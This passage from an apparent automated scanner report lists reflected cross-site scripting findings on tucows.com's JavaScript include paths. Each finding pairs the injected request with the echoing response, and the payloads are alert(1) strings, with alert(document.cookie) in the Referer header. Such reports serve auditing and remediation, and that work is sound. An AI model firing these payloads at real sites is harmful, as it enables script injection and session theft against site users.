Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js87352"-alert(1)-"0f2157d1bbf/ajaxlib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.350. http://www.tucows.com/includes/js/ajaxlib.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3034"-alert(1)-"04ca174d04c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/ajaxlib.jse3034"-alert(1)-"04ca174d04c HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 33092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js/ajaxlib.jse3034"-alert(1)-"04ca174d04c";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.351. http://www.tucows.com/includes/js/show_layer.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/show_layer.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5361f"-alert(1)-"5652dc7710f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes5361f"-alert(1)-"5652dc7710f/js/show_layer.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes5361f"-alert(1)-"5652dc7710f/js/show_layer.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.352. http://www.tucows.com/includes/js/show_layer.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/show_layer.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b38e1"-alert(1)-"042603f8178 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/jsb38e1"-alert(1)-"042603f8178/show_layer.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/jsb38e1"-alert(1)-"042603f8178/show_layer.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.353. http://www.tucows.com/includes/js/show_layer.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/show_layer.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82ec8"-alert(1)-"817640c3898 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/show_layer.js82ec8"-alert(1)-"817640c3898 HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js/show_layer.js82ec8"-alert(1)-"817640c3898";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.354. http://www.tucows.com/includes/js/signupin.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/signupin.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da601"-alert(1)-"3c77224e1a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includesda601"-alert(1)-"3c77224e1a9/js/signupin.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includesda601"-alert(1)-"3c77224e1a9/js/signupin.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.355. http://www.tucows.com/includes/js/signupin.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/signupin.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e58a"-alert(1)-"92953272be5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js7e58a"-alert(1)-"92953272be5/signupin.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js7e58a"-alert(1)-"92953272be5/signupin.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.356. http://www.tucows.com/includes/js/signupin.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/signupin.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee858"-alert(1)-"2b00b808463 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/signupin.jsee858"-alert(1)-"2b00b808463 HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js/signupin.jsee858"-alert(1)-"2b00b808463";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.357. http://www.tucows.com/includes/js/x_core.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/x_core.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65747"-alert(1)-"fdf529e6e6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes65747"-alert(1)-"fdf529e6e6b/js/x_core.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes65747"-alert(1)-"fdf529e6e6b/js/x_core.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.358. http://www.tucows.com/includes/js/x_core.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/x_core.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18d3d"-alert(1)-"9fd657fe3af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js18d3d"-alert(1)-"9fd657fe3af/x_core.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js18d3d"-alert(1)-"9fd657fe3af/x_core.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.359. http://www.tucows.com/includes/js/x_core.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/x_core.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b794b"-alert(1)-"c38b7601809 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/x_core.jsb794b"-alert(1)-"c38b7601809 HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
